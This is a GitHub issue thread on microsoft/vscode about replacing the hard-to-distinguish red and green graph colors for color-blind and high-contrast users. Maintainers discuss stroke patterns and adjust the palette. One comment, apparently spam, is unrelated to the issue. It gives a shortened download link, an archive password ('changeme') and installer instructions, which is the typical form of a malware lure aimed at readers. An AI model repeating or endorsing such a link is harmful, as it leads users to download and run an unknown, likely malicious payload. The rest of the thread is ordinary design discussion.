### ISSUE TITLE
Consider using better contrasting colors than red and green

### ISSUE THREAD

**Issue by Tyriar** [microsoft/vscode#226795]
Testing #226648

I mentioned red, green, yellow in https://github.com/microsoft/vscode/issues/226792 which should probably be associated with their meaning. Even if they're renamed, consider not using red and green in areas where contrast is important as red/green color blindness is very common. 

![image](https://github.com/user-attachments/assets/053da987-c111-4b07-97c0-cbda511bc4e0)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Tyriar** [comment]
Especially on HC light, I can barely tell these apart:

<img width="118" alt="Screenshot 2024-08-27 at 10 36 02 AM" src="https://github.com/user-attachments/assets/86b02eac-60d6-40f7-9c01-fca882aa61e9">

**Comment by lszomoru** [comment]
@daviddossett, do you have bandwidth this milestone to review the graph theme colors and add some more? Thanks!

**Comment by daviddossett** [comment]
I doubt colors will be enough here. I think differentiating with stroke patterns (dotted, dashed, etc.) is probably a more reliable way for HC users to distinguish.

**Comment by Tyriar** [comment]
To clarify, there are 6 colors currently, the bottom three below are the "main" ones:

![Image](https://github.com/user-attachments/assets/36a14490-7407-4263-a4cc-b6a39790953b)
![Image](https://github.com/user-attachments/assets/f8f77988-f596-4def-bb95-d83724431ca5)

**Comment by lszomoru** [comment]
I will play around with this tomorrow but if you have explicit suggestions on which colors from the VS Code color palette we should use please let me now. I would also like to expand the color registry used by the graph to probably include 3 more colors. Opened to suggestions.

![Image](https://github.com/user-attachments/assets/366a2474-6202-410d-b060-6defef82f5e9)

**Comment by lszomoru** [comment]
I have tweaked the default colors used for the graph.
